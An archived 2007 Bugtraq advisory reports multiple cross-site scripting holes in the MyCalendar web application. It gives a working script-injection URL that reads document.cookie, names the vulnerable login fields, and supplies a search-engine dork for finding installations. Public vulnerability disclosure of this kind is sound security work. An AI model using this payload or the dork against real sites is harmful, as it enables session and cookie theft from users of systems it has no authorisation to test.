lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070219221309.22375.qmail@securityfocus.com> Date: 19 Feb 2007 22:13:09 -0000 From: sn0oPy.team@...il.com To: bugtraq@...urityfocus.com Subject: MyCalendar multiple XSS * MyCalendar multiple XSS * By : sn0oPy * Risk : medium * site : http://abledesign.com/programs/MyCalendar/ * exploit : XSS on the search menu : http://www.target.ma/calendar/index.php?go=search XSS on the url : http://www.target.ma/calendar/index.php?go="><script>alert(document.cookie)</script> XSS on the username and password at http://www.target.ma/crown/cal/index.php?go=Login * dork : intitle:"myCalendar" * contact : sn0oPy@...nir-geopolitique.net * Site : http://forums.avenir-geopolitique.net * greetz : [subzero], Avg Team. * Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2686